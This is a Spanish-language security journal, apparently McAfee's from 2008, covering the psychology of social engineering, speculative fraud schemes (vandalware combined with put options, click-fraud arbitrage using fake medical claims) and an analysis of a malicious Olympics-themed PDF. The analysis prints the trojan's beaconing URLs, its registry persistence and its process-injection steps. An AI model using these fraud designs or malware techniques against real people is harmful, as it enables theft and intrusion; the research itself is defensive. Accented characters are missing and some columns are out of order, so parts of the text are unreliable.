Error fundamental de atribucin las personas asumimos que los comportamientos de los dems reflejan sus caractersticas internas estables19. ste es el error de las primeras impresiones equivocadas. Un ingeniero social se emplear con diligencia para crear una primera impresin favorable. Un agresor podra mostrarse amable a la hora de hacer una solicitud, o dominante a la hora de coaccionar a sus vctimas para que hagan algo. las vctimas pueden no percatarse de que sus interlocutores son actores y de que su comportamiento es circunstancial, un medio para lograr un fin. Efecto de saliencia Dado un grupo de personas, tendemos a creer que la persona con mayor o menor influencia es la que ms sobresale20. los ingenieros sociales son expertos en mezclarse y confundirse con su entorno, y tratan por todos

oToo 2008

11

conclusin
nuestra susceptibilidad a la ingeniera social tiene su origen en la estructura del cerebro humano, en la compleja interaccin entre los centros de la emocin y la razn. la ingeniera social es la manipulacin del miedo, la curiosidad, la codicia o la compasin de la vctima. los sesgos y errores cognitivos en nuestros esquemas sociales permiten explicar el xito de la ingeniera social. entonces, por qu esta informacin es tan importante para nosotros? en la encuesta anual sobre seguridad y crimen informtico (computer crime and security survey) de 2007 realizada por el instituto para la seguridad informtica (csI), slo un 13% de los encuestados manifest haber comprobado cun eficaz era la formacin de sus empleados frente a los ataques de ingeniera social21. aunque un 13% es un cifra baja, la encuesta no inclua a los encuestados que no tenan un programa de formacin sobre ataques de ingeniera social. Un paso obvio es crear y mejorar las polticas de seguridad y los programas de formacin de los usuarios sobre ingeniera social. cualquier poltica en materia de ingeniera social resultar ms convincente si utiliza estudios cientficos que la avalen. asimismo, los materiales formativos de los usuarios tambin sern ms eficaces si incluyen los sesgos cognitivos que suelen aprovechar los ingenieros sociales, y los vdeos didcticos ms provechosos si reproducen ataques que aprovechan cada uno de nuestros sesgos cognitivos. no podemos cambiar la naturaleza humana. Hemos nacido con nuestras emociones y razn divididas, y somos propensos a cometer errores mentales. esto es normal, pero dicho comportamiento es peligroso bajo el dictado de los ingenieros sociales. si entendemos la psicologa de la ingeniera social y formamos a los usuarios para que conozcan sus efectos, podremos defendernos de estos ataques con mayor xito.

Karthik Raman, cIssP, es cientfico de investigacin en Mcafee avert labs. sus reas de investigacin incluyen el anlisis de vulnerabilidades y la seguridad de redes y software. adems de la seguridad, tambin est interesado en las ciencias cognitiva y social, y en la programacin de equipos. Para divertirse, raman juega al cricket, toca la guitarra y estudia idiomas. raman se licenci en Informtica y seguridad Informtica en la norwich University (Vermont) en 2006.

NOTAS
1 Bank loses $1.1M to online fraud (Un banco sufre prdidas de 1,1 millones de dlares a causa de un fraude online), BBc (2007). http://news.bbc.co.uk/2/hi/business/6279561.stm 2 schneier, B., The Psychology of security (la psicologa de la seguridad), essays and op eds (2007). http://www.schneier.com/essay-155.html 3 Ibid. 4 asimov, I. el cerebro humano, Barcelona: ediciones Toray, 1967. 5 Johnson, s. la mente de par en par: nuestro cerebro y la neurociencia en la vida cotidiana, Madrid: ediciones Turner, 2006. 6 svoboda, e. cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward (cultivar la curiosidad; cmo explorar el mundo: el desarrollo del sentido del asombro puede ser su propia recompensa), Psychology Today (2006). http://psychologytoday.com/articles/index.php?term=pto-4148.html 7 leyden, J. Hackers debut malware loaded UsB ruse (los piratas estrenan la estratagema de las unidades UsB infectadas con malware), The register (2007). http://www.theregister.co.uk/2007/04/25/usb_malware/ 8 Mcafee VIl: gPcoder.i, 9 de junio de 2008. http://vil.nai.com/vil/content/v_145334.htm 9 cialdini, r. Influence: The Psychology of Persuasion (Influencia: la psicologa de la persuasin), nueva york: Harpercollins, 1998. 10 Heuer, richard J., Jr. The Psychology of Intelligence analysis (la psicologa del anlisis de la inteligencia), Center for the Study of Intelligence, cIa (2002). http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html 11 Tversky, a. y Kahneman, D. Judgment under uncertainty: Heuristics and biases (Juicio ante la incertidumbre: heurstica y sesgos), science, 185, 1124-1130 (1974). http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf 12 Mather, M., shafir, e., y Johnson, M. K. Misrememberance of options past: source monitoring and choice (Distorsin de opciones pasadas: supervisin del origen y eleccin), Psychological Science, 11, 132-138 (2000). http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf 13 nickerson, r. s. confirmation Bias: a Ubiquitous Phenomenon in Many guises (sesgo de confirmacin: un fenmeno ubicuo con muchas formas), Review of General Psychology, Vol. 2, no. 2, 175-220 (1998). http://psy.ucsd.edu/~mckenzie/nickersonconfirmationBias.pdf 14 Zajonc, r. B. attitudinal effects of Mere exposure (efectos actitudinales de la mera exposicin), Journal of Personality and Social Psychology, 9, 2, 1-27 (1968). 15 Kaplan, D. Virginia Tech massacre may spawn phishing scams (la masacre de Virginia Tech puede dar pie a fraudes de tipo phishing), SC Magazine (2007). http://www.scmagazineuk.com/Virginia-Tech-massacre-may-spawn-phishing-scams/ article/105989/ 16 Tversky, a. y Kahneman, D. Judgment under uncertainty: Heuristics and biases (Juicio ante la incertidumbre: heurstica y sesgos), Science, 185, 1124-1130 (1974). Disponible en http://psiexp.ss.uci.edu/research/teaching/ Tversky_Kahneman_1974.pdf. 17 Dhamija, r., ozment, a., schecter, s. The emperors new security Indicators: an evaluation of website authentication and the effect of role playing on usability studies (los nuevos indicadores de seguridad de emperor: una evaluacin de la autenticacin de sitios Web y el efecto de los juegos de rol en los estudios de la usabilidad), (2008). http://www.usablesecurity.org/emperor/ 18 Mitnick, Kevin D., simon, William l. el arte de la intrusin, Mxico: ra-Ma, 2007. 19 gilbert, D. T., y Malone, P. s. The correspondence bias (el sesgo de correspondencia), Psychological Bulletin, 117, 2138 (1995). http://www.wjh.harvard.edu/~dtg/gilbert%20&%20Malone%20 (corresPonDence%20BIas).pdf 20 Taylor, s.e. y Fiske, s.T. Point of view and perception so causality (Punto de vista y percepcin de la causalidad), Journal of Personality and Social Psychology,, 32, 439-445 (1975). 21 computer security Institute, csI computer crime and security survey (2007). http://www.gocsi.com/forms/csi_survey.jhtml (es necesario registrarse)

12

McaFee secUrITy JoUrnal

Ingeniera social 2.0: y ahora qu?

Markus Jakobsson

aunque posiblemente la ingeniera social ha estado entre nosotros desde los orgenes de la civilizacin, son muchos los que muestran su preocupacin porque en la actualidad se est transformando y sembrando el caos en Internet. en este artculo, ofrecemos algunas previsiones sobre lo que cabe esperar en el futuro.
Parece obvio que la ola de crimeware que vivimos est motivada por los incentivos econmicos. la situacin actual nada tiene que ver con la que observamos en el pasado. los primeros virus eran slo una expresin de curiosidad intelectual, competitividad y quizs algo de hasto. esto es especialmente patente en el caso de los fraudes de clic y el phishing. Qu otra motivacin se puede encontrar que no sea la de conseguir algo de dinero? (o a veces, incluso mucho dinero.) Igual ocurre con el spam en sus distintos formatos. si los remitentes de spam no ganaran dinero, no habra spam. Por lo tanto, si deseamos prever cules sern las tendencias en el futuro, tiene sentido plantearse cmo pueden obtener beneficios los delincuentes mediante el uso fraudulento de las funciones actuales de Internet.

los defensas configuran los ataques

Desde el punto de vista de los delincuentes, cometer fraudes a travs de Internet es una actividad relativamente cmoda y segura. aparte de ser el teletrabajo perfecto para un gamberro, ofrece escalabilidad, alta rentabilidad y le permite en gran medida ocultar su rastro, por lo que el riesgo es mnimo. as que, no es de extraar que el fraude a travs de Internet se haya disparado. Pero, para comprender los ataques, debemos comprender tambin las defensas. es evidente que en la actualidad la lucha contra los delitos se articula en tres planos diferentes: las herramientas tcnicas (como el software antivirus, los filtros para el correo spam y los complementos del navegador para impedir el phishing); las campaas educativas (como las organizadas por FTc, eBay, securitycartoon.com, bancos y el grupo carnegie Mellon University Usable Privacy and security laboratory [cUPs]) y, por ltimo, los medios legales. estos ltimos normalmente implican la localizacin del origen, la requisicin de la caja de caudales y, por ltimo, el procesamiento de los responsables. las iniciativas en el campo tcnico y educativo, si funcionaran, reduciran la rentabilidad para los delincuentes y, por otro lado, los esfuerzos legales aumentaran el riesgo de sus actividades. estos riesgos son importantes, especialmente si tenemos en cuenta lo fcilmente que escala el fraude a travs de Internet. Por lo tanto, no es descabellado pensar que la prxima frontera en la ciberdelincuencia incluir un componente que dificulte el seguimiento. Tomemos como vlido este supuesto e investiguemos qu podra significar en el futuro. Para ello, vamos a considerar dos tipos de ataques muy difciles de localizar. Hasta la fecha no se ha producido ninguno de ellos, pero ambos estn preparados. Pero, en primer lugar, para entender realmente la importancia del aspecto legal, nos saldremos por la tangente y analizaremos por qu el ransomware no se convirti nunca en el desastre que muchos vaticinaban.

Fraudes en Internet: un delito sociotcnico

cada vez ms expertos reconocen que el fraude ya no es nicamente un problema de carcter tcnico, sino que existe un componente de ingeniera social que est cada da ms presente. el phishing es un buen ejemplo, pero no el nico. cada vez son ms habituales los ataques de crimeware que dependen de la ingeniera social para su instalacin. Un ejemplo reciente es el timo denominado "Better Business Bureau", que se ilustra en la Figura 1. en este ataque de phishing, la vctima potencial recibe un mensaje de correo electrnico que parece proceder de la empresa Better Business Bureau, en relacin con una reclamacin contra la empresa del destinatario. el adjunto, que supuestamente contiene los detalles de la queja, en realidad incluye un troyano de descarga. y lo que es peor, estos mensajes se suelen enviar a las personas con ms responsabilidad en la empresa, normalmente a los encargados de atender las quejas de los clientes a diario.

oToo 2008

13

el fracaso del ransomware

a finales de la dcada de los 90, algunos investigadores de la Universidad de columbia afirmaron que la siguiente ola de malware podra intentar secuestrar los archivos de los equipos de las vctimas codificndolos mediante una clave pblica incluida en el cuerpo del malware. a continuacin, los delincuentes pediran un rescate a cambio de la clave secreta que proporcionara acceso a los archivos cifrados. aos despus, el troyano archiveus realiz un ataque de estas caractersticas, aunque con una pequea diferencia: utiliz criptografa de clave simtrica, en lugar de una clave pblica. el ataque se frustr cuando, mediante un proceso de ingeniera inversa del troyano, se extrajo la clave de cifrado/descifrado y se distribuy a todas las personas que haban sido vctimas del ataque. sin embargo, es posible que el ataque de archiveus nunca hubiera prosperado aunque hubiese utilizado criptografa de clave pblica (que, por su naturaleza, habra impedido revertir la ingeniera de la clave de cifrado del cdigo, ya que, en primer lugar, nunca habra estado ah). el motivo por el que archiveus habra fracasado no es de carcter tcnico; sino que es ms bien de carcter financiero: los delincuentes no podran nunca haber recogido el rescate de forma segura sin dejar ningn rastro.

y qu ocurrira si alguien abriera o ejecutara el archivo adjunto? Pongamos por caso que el mensaje no terminara en la carpeta de spam y que el sistema antivirus no lo detectara, entonces, tendramos una infeccin en un equipo con acceso a informacin confidencial o al sitio Web de la empresa. y qu pasara si parte de esa informacin confidencial acabara en Internet, incluso en el sitio Web de la propia empresa? el revuelo sera inevitable y el precio de las acciones se vera afectado. entonces, el delincuente hara efectivas sus opciones de venta, aprovechndose de que conoca de antemano que el precio de las acciones de la empresa iba a descender. su comportamiento no parecera sospechoso, no sera posible localizarlo, ya que todos los inversores con opciones de venta estaran en la misma situacin. Quin sera el delincuente? nadie podra decirlo.

Falsificacin de clics
el fraude del clic es otro tipo de fraude habitual en Internet. aprovecha el hecho de que cuando un particular hace clic en un anuncio, el anunciante paga una comisin al sitio Web que contiene el anuncio y al portal que proporciona el anuncio al sitio Web. otros tipos de fraude relacionados aprovechan la publicidad en la que se transfiere dinero cuando el particular ve un anuncio de banner, con independencia de lo que haga, y otras modalidades en las que se genera una venta u otra accin cuando alguien ve un anuncio. el objetivo puede ser obtener beneficios econmicos de estas transferencias (los delincuentes obtienen ganancias cuando sus sitios Web muestran los anuncios) o agotar el presupuesto para publicidad de sus competidores (cuando stos son los anunciantes desde los que se transfiere el dinero). con frecuencia, los delincuentes generan trfico de forma automtica, de forma que parezca que personas reales han visto los anuncios. la automatizacin puede incluir distintas formas de malware, como las redes de bots. otro mtodo habitual entre los delincuentes es contratar a personas para que hagan clic en determinados anuncios; esto se denomina "click farm" (literalmente, "fbrica de clics").
Reclamacin contra BBB

el azote del vandalware

sin perder de vista el ejemplo del ransomware, consideraremos un nuevo tipo de ataque, que podemos denominar "vandalware". no se trata de vandalismo por diversin o rebelda, sino ms bien como medio de conseguir dinero. el delincuente actuara de la siguiente forma: en primer lugar, seleccionara una empresa como objetivo y utilizara tcnicas de extraccin de datos para obtener el mximo de informacin sobre los empleados que son vulnerables. entendemos por empleado vulnerable aquel que tiene acceso a datos confidenciales o bien a las pginas de la fachada de la pgina Web de la empresa. a partir de ellos, uno de estos vndalos puede conseguir informacin de la estructura interna de la empresa, los nombres de los empleados clave y el formato utilizado para las direcciones de correo electrnico. en segundo lugar, el delincuente adquirira opciones de venta de la empresa. (Damos por supuesto que se trata de una empresa que cotiza en bolsa.) Una opcin de venta es un instrumento financiero que aumenta su valor si el precio de la accin correspondiente cae; los inversores y especuladores utilizan las opciones de venta para obtener ganancias cuando disponen de informacin de que una accin determinada va a perder valor. con toda probabilidad, otros inversores, no slo el delincuente, compraran tambin opciones de venta, especialmente si el volumen de negociacin de las acciones de la empresa es considerable. en tercer lugar, el delincuente desencadenara un ataque contra la empresa, quizs enviando a los empleados seleccionados mensajes falsos como si procedieran de otro empleado, como su jefe: Hola Juan. Mira las diapositivas de PowerPoint que adjunto y dime qu piensas. si es posible, envame una evaluacin rpida para maana por la maana. espero que puedas hacerlo. o, quizs, de un administrador del sistema: Hay un nuevo virus informtico y nuestros sistemas no disponen an de los parches necesarios para neutralizarlo. Instalar inmediatamente en vuestros equipos el programa que adjunto. es importante hacerlo cuanto antes.

BBB CASE #569822971

Complaint filed by: Michael Taylor Complaint filed against: Complaint status: Category: Case opened date: Contract Issues Case closed date: 2/28/2008 *** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.*** On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the business.) The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. 2008 BBB.org, All Rights Reserved. <Complaint_569822971.doc> Business Name: Contact: BBB Member:

Figura 1: Timo del Better Business Bureau. El mensaje contiene un adjunto infectado que el agresor espera que abra el destinatario.

14

McaFee secUrITy JoUrnal

a continuacin, describiremos cmo se puede utilizar la ingeniera social en una nueva clase de fraude de clic. en primer lugar, empezaremos por explicar el caso ms habitual que no constituye un fraude de clic:

Caso 1 sitio Web estndar. Pensemos en un sitio Web legtimo que proporciona determinados servicios y que muestra anuncios relativos a dichos servicios. los portales de anuncios (por ejemplo, google y yahoo) normalmente determinan de forma automtica el contenido de los anuncios. Para ello, examinan el contenido del sitio Web y seleccionan anuncios sobre temas relacionados con dicho contenido. si, por ejemplo, el sitio Web se dedica a la cocina, los anuncios pueden referirse a bateras de cocina, sartenes o cafeteras. normalmente estos sitios colocan anuncios que atraen trfico. en este sitio cabe esperar ver anuncios que utilicen las palabras clave cuchillo, horno, tefln y otros similares. no hay nada inusual en este tipo de sitio. Caso 2 Uso de arbitraje. ahora, consideremos un segundo sitio Web que tiene contenido que selecciona anuncios correspondientes a las palabras clave buscar abogados (find a attorney). (exactamente buscar abogados y no buscar abogado. Pronto explicaremos por qu.) el sitio puede utilizar para esto mucho texto (visible o no) que repite esta frase. supongamos que, cuando se escribi este artculo, el coste de este tipo de estrategia era de 1,07 a 7,05 dlares por palabra clave (precio en estados Unidos para las palabras correspondientes en ingls). el precio exacto depende del lugar, la hora del da y, naturalmente, las dems ofertas que haya para las palabras clave en cuestin, ya que todos los precios de palabras clave se establecen en subastas. De este modo, si un usuario hace clic en un anuncio de este sitio, el propietario del anuncio tendra que pagar ese importe al portal, que a su vez transferira ese importe, descontando su comisin, al sitio Web que muestra el anuncio. ahora, imaginemos que el sitio en cuestin incluye un anuncio que utiliza la palabra clave buscar abogado. la nica diferencia es una s. el precio de esta palabra clave va de 0,87 a 3,82 dlares. supondremos que el sitio Web paga 2 dlares por cada visitante que consigue y recibe 4 por cada visitante que hace clic en un anuncio del sitio. siempre que el cincuenta por ciento de los visitantes que llegan a travs del anuncio de 2 dlares hagan clic en un anuncio de 4 dlares, el sitio Web consigue ganancias, sin proporcionar ningn servicio. esto se conoce como arbitraje de palabras clave. no es exactamente igual que el fraude de clic, pero, como podremos ver, se acerca.

ciento de los enfermos de asma tienen riesgo de contraer mesotelioma? aunque esta afirmacin no es cierta, habr muchas personas a las que les preocupa el asma y que no saben nada del mesotelioma. estas personas harn justo lo que pretende el delincuente: hacer clic. sern la mitad de los visitantes? si hay mil visitantes al da, esto significa que las ganancias diarias superarn los 30.000 dlares. e incluso si utilizara palabras clave menos llamativas, el delincuente conseguira unas ganancias nada desdeables. lo que distingue estos tres casos es la intencin y el uso que se hace de la ingeniera social. Desde la perspectiva de los proveedores de anuncios, estos tres casos son muy similares en cuanto a estructura. Un visitante entra, lee el contenido y hace clic en un anuncio. aunque es posible comparar las palabras clave que entran y las que salen para localizar anomalas, los delincuentes tambin pueden utilizar un proveedor de servicios para generar respectivamente el trfico entrante y el trfico saliente. esta estrategia dificulta la deteccin y la neutralizacin de estos tipos de ataques, especialmente si se llevan a cabo a pequea escala con un nmero reducido de sitios.

conclusin
la ingeniera social ha llegado a Internet para quedarse. sus efectos ya son patentes a travs de timos de phishing y ahora empezamos a observar cmo los delincuentes utilizan la ingeniera social para mejorar la eficacia del spam y el crimeware. adems, mucho nos tememos que nos aguardan aplicaciones an ms sofisticadas a la vuelta de la esquina, resultado de la cada vez mayor complejidad del uso de la ingeniera social en otros tipos de fraude, como el fraude de clic. conscientes de esto, podemos disear medidas tcnicas y gracias al conocimiento de los posibles modos de ataque en el futuro, podremos mejorar las defensas. Pero debemos entender tambin que nuestra estrategia requiere mejores interfaces de usuario, mejores procedimientos, una legislacin ms restrictiva y mejores campaas educativas. Todava queda mucho por hacer.

Caso 3 Un ataque utilizando ingeniera social. ahora veremos cmo podra utilizar un delincuente la ingeniera social y explotar la tcnica del arbitraje con el fin de conseguir ganancias espectaculares. supongamos que el delincuente crea un sitio Web que genera la palabra clave mesotelioma (un tipo de cncer poco frecuente provocado por la exposicin al amianto). en el momento de redaccin de este documento, esta palabra clave de google cuesta 63,42 dlares (precio en estados Unidos de la palabra en ingls). el delincuente compra trfico para la palabra clave asma (0,10 dlares) para atraer visitantes al sitio. si de 634 personas que entren al sitio una hace clic en el anuncio del mesotelioma, el delincuente gana dinero. Pero, por qu hara alguien algo as? supongamos que el contenido del sitio Web es un artculo, supuestamente escrito por un mdico, que pregunta: saba que el diez por

Dr. Markus Jakobsson es cientfico jefe en el centro de investigacin Palo alto research center. se encarga de la investigacin del phishing y de las medidas para combatirlo, los fraudes de clic, el factor humano en la seguridad, la criptografa, la proteccin de las redes y el diseo de protocolos. es editor de Phishing and Countermeasures (el phishing y las medidas para combatirlo; Wiley, 2006) y coautor de Crimeware: Understanding New Attacks and Defenses (crimeware: los nuevos ataques y las defensas; symantec Press, 2008).
Imagen cortesa de Parc, fotgrafo: Brian Tramontana.

oToo 2008

15

Un objetivo perfecto para el malware de ingeniera social

Elodie Grandjean

los creadores de malware suelen emplear mtodos de ingeniera social para infectar directamente un sistema o un host o para iniciar una cascada de descargas y ejecutar malware.
la mayora de nosotros hemos recibido algn mensaje de correo electrnico que contena adjuntos o Url maliciosos con informacin sobre una importante actualizacin de seguridad o sobre un viejo amigo deseoso de restablecer el contacto perdido. Pero no vaya a creerse que el correo electrnico es el nico vector de ataque utilizado para propagar malware con trucos de ingeniera social. Hay muchas otras trampas, incluido el uso de conocidos servicios de mensajera instantnea. el sistema infectado de un amigo puede enviarle un mensaje solicitndole que vea unas imgenes con una Url que seala a un archivo. el problema est en que confa en el contacto y no sabe que el otro sistema est afectado. en muchos casos, la Url le lleva al malware. otras aplicaciones de malware recurren a la ingeniera social para robar informacin confidencial, como credenciales de inicio de sesin, nmeros de tarjetas de crdito, etc. estas tcnicas suelen utilizarse en ataques de phishing o intrusiones en servidores. los trucos ms frecuentes de ingeniera social que emplean los creadores de malware son los de servicios para adultos, pero hay otros. He aqu una lista, aunque es claramente incompleta:

Mensajes de correo electrnico amenazadores sobre penas de crcel o procedimientos de actuacin como miembro de un jurado salvapantallas y juegos gratuitos que contienen un troyano, o herramientas antispyware gratuitas que con frecuencia son programas no autorizados grandes acontecimientos, como encuentros deportivos, desastres climticos o noticias urgentes nombres de famosos y noticias sobre sus aventuras y escndalos relaciones que pueden ser de confianza o secretas, como afiliaciones a sitios Web de redes sociales, listas de amigos, compaeros de clase, familiares y amantes secretos

Vnculos e imgenes pornogrficos Uso de nombres de mujer en el campo del remitente Programas polticos que solicitan contribuciones en nombre de un candidato clebre Mensajes falsos de correo electrnico procedentes de bancos, servicios de pago electrnico y otros servicios financieros que solicitan la confirmacin o actualizacin de las credenciales de inicio de sesin o informacin sobre la tarjeta de crdito

el catlogo de temas es prcticamente ilimitado, lo que significa que es posible acercarse a grandes grupos de usuarios de todo el mundo y que la ingeniera social puede dirigirse con frecuencia a grupos de usuarios nacionales e incluso locales. Por ejemplo, con un ataque global que tenga como marco un sitio Web de red social muy visitado, el creador de malware puede obtener respuestas de todo el mundo; por su parte, es probable que un ataque similar en las elecciones presidenciales estadounidenses slo capte vctimas norteamericanas.

16

McaFee secUrITy JoUrnal

Por qu las olimpiadas?

Durante meses, china ha estado en el punto de mira a causa de los Juegos olmpicos de Pekn 2008. el inters de los medios de comunicacin ha sido enorme y ha abarcado a atletas, aficionados, infraestructura, medio ambiente y poltica, entre otros. en el terreno poltico, las protestas por la situacin del Tbet han sido un tema muy delicado; muchas organizaciones de todo el mundo a favor del Tbet libre se han beneficiado del protagonismo de las olimpiadas. Tambin otros asuntos, como la esclavitud laboral y los derechos humanos, han cobrado ms relieve. y numerosos usuarios de Internet estn lo suficientemente interesados como para leer noticias y otros artculos online. la antorcha olmpica se convirti en un smbolo candente de los manifestantes en los meses anteriores a los Juegos. el viaje de la antorcha por todo el mundo tuvo una tremenda difusin en los medios de comunicacin y acrecent si cabe el inters y la participacin de seguidores y oponentes. este inters creciente tambin ampli el rea de ataque potencial que podan explotar los creadores de malware.

El uso de los Juegos Olmpicos como eje de ingeniera social permiti a los creadores de malware dirigirse a muchos entusiastas del deporte, adems de a todas las personas previamente identificadas por su inters en el conflicto entre el Tbet y China.

llegado este punto, la base de vctimas, que hasta entonces inclua a las organizaciones elegidas al principio y a sus simpatizantes, pas a englobar a cualquiera que sintiera curiosidad sobre la situacin en el Tbet. Una vez ms, la atencin de los medios favoreci este incremento entre la poblacin vulnerable. a continuacin, los creadores de malware se aprovecharon de los propios Juegos olmpicos para propagar ataques de ingeniera social con la aparicin del rootkit pro-Tbet2. este conjunto de archivos malintencionados funcionaba oculto bajo un archivo de pelcula de animacin que ridiculizaba el esfuerzo de un gimnasta chino; durante su reproduccin, varios archivos maliciosos se introducan inadvertidamente en el sistema de la vctima e instalaban un rootkit para esconderse. el uso de los Juegos olmpicos como eje de ingeniera social permiti a los creadores de malware dirigirse a muchos entusiastas del deporte, adems de a todas las personas previamente identificadas por su inters en el conflicto entre el Tbet y china.

Muestreo de vctimas
normalmente, los ataques de ingeniera social necesitan muestrear antes a sus vctimas para tener xito. Veamos quines podan ser las vctimas potenciales de un ataque que tuviera como cebo el conflicto china-Tbet o los Juegos olmpicos. ya hemos visto que, en los grupos a favor del Tbet, algunas personas reciban mensajes de correo electrnico sobre la situacin tibetana, china en general o las olimpiadas, con datos adjuntos cHM (archivos de ayuda compilados), PDF, PPT, Xls o Doc. Todos estos mensajes parecan proceder de una organizacin o persona de confianza. Probablemente estos usuarios estaban acostumbrados a recibir este tipo de documentos de sus simpatizantes y haban bajado la guardia. estos datos adjuntos en concreto eran malintencionados: utilizaban varias vulnerabilidades de la ayuda de HTMl compilado de Microsoft, adobe acrobat, Microsoft excel, Microsoft PowerPoint o Microsoft Word para introducir y ejecutar sigilosamente archivos ejecutables incrustados. en ese momento el rea de ataque elegida era relativamente pequea, pero la difusin meditica de las protestas en el Tbet contribuy a avivar la llama. Ms adelante se piratearon algunos sitios Web legtimos dedicados a apoyar al Tbet para incrustar el troyano Fribet1, que se descarga por s solo en los equipos de los visitantes aprovechando vulnerabilidades de los navegadores Web.

oToo 2008

17

caso real: ataque de malware en torno a los Juegos olmpicos

Hace poco recibimos el archivo PDF declaration_olympic_games_ eng.pdf, enviado inicialmente a un grupo pro Tbet (Vase la Figura 1). este documento pareca inofensivo porque al abrir la aplicacin apareca el texto y no haba daos ni problemas inmediatos. Por lo tanto, en general nadie sospechaba de actividades malintencionadas. sin embargo, en segundo plano se creaban subrepticiamente archivos maliciosos en el equipo de la vctima. Veamos exactamente cmo funcionaba el ataque. en realidad, declaration_olympic_games_eng.pdf es un archivo PDF vaco que aprovecha una vulnerabilidad de acrobat para introducir y ejecutar la primera parte del paquete malicioso. este archivo ejecutable malintencionado (detectado como BackDoorDoW3) se incrusta en formato cifrado en la ubicacin que muestra el editor hexadecimal de la Figura 2 (pgina siguiente). la Figura 3 (pgina siguiente) muestra los primeros bytes del archivo incrustado una vez descifrado.

este ejecutable introduce el archivo PDF legtimo, book.pdf, que se muestra al ejecutar el primer archivo. el archivo dropper busca el proceso AcroRd32.exe en la lista de procesos activos, encuentra el directorio donde est instalado acrobat y abre book.pdf. la Figura 4 muestra en la pgina siguiente el cdigo del archivo responsable de esta accin. el malware tambin introduce otro archivo ejecutable, book.exe, que se copia en %PERFILTODOSUSUARIOS%\Application Data\ msmsgs.exe y crea un nuevo servicio de Windows4. este nuevo servicio se muestra con el nombre servicio administrador de discos lgicos y se encarga de que, al iniciarse, Windows ejecute el troyano automticamente. el malware tiene incluso un plan B para interceptar el proceso de inicio: si no consigue crear el servicio, aade una nueva entrada de registro, Windows Media Player, que seala a msmsgs.exe. Windows Media Player se aade a la siguiente clave de inicio del registro de Windows5: HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run. el troyano tambin crea dos archivos que contienen datos cifrados:

C:\WINDOWS\jwiev.log.bak C:\WINDOWS\clocks.avi.bak

Sponsors declaration of responsibility at the 2008 Beijing Olympic Games

WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity, as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the Peoples Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwid concerns expressed about Chinas human rights record. IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY

Figura 1: Hace poco los partidarios del Tbet recibieron este archivo aparentemente legtimo adjunto a un mensaje de correo electrnico.

Name/Title Date

18

McaFee secUrITy JoUrnal

Finalmente, book.exe desaparece creando un archivo por lotes que se autoelimina y autofinaliza. a partir de ese momento, msmsgs.exe toma el relevo. Msmsgs.exe introduce temporalmente otro archivo en la siguiente ubicacin: C:\Archivos de programa\WindowsUpdate\ Windows Installer.exe. Justo antes de borrarse, Windows Installer.exe introduce dos copias de un archivo Dll en:

el cdigo malicioso inyectado en svchost.exe llama a la funcin workFunc() de avp01.lic, que se conecta a un servidor remoto y enva tres solicitudes:

http://www1.palms[eliminado]/ld/v2/loginv2.asp?hi=2wsdf351&x =0720080510150323662070000000&y=192.168.1.122&t1=ne http://www1.palms[eliminado]/ld/v2/votev2.asp?a=7351ws2&s =0720080510150323662070000000&t1=ne http://www1.palms[eliminado]/ld/v2/logoutv2.asp?p=s9wlf1&s =0720080510150323662070000000&t1=ne

C:\Documents and Settings\All Users\DRM\drmv021.lic C:\Documents and Settings\All Users\DRM\avp01.lic

el malware se inyecta en svchost.exe para ocultar su actividad. lanza una nueva instancia de svchost.exe (proceso legtimo del sistema6), asigna un bloque de memoria en el espacio de direcciones de este nuevo proceso, guarda una copia de s mismo en el espacio de direcciones virtual de svchost.exe (en la direccin 0x400000) y ejecuta el cdigo malicioso creando un subproceso remoto.

los parmetros x e y pueden diferir. el valor de x se forma al concatenar 07 con la fecha (10/05/2008) y la hora (15:03:23) exactas en que se cre el archivo clocks.avi.bak y, para finalizar, con el cdigo no modificable 662070000000. el valor de y es la direccin IP del equipo de la vctima.

Figura 2: Este PDF malicioso transportaba una copia cifrada del malware BackDoor-DOW. Figura 4: El malware busca Acrobat Reader (AcroRd32.exe) y abre el archivo inocente book.pdf..

Figura 3: Versin descifrada de BackDoor-DOW.

oToo 2008

19

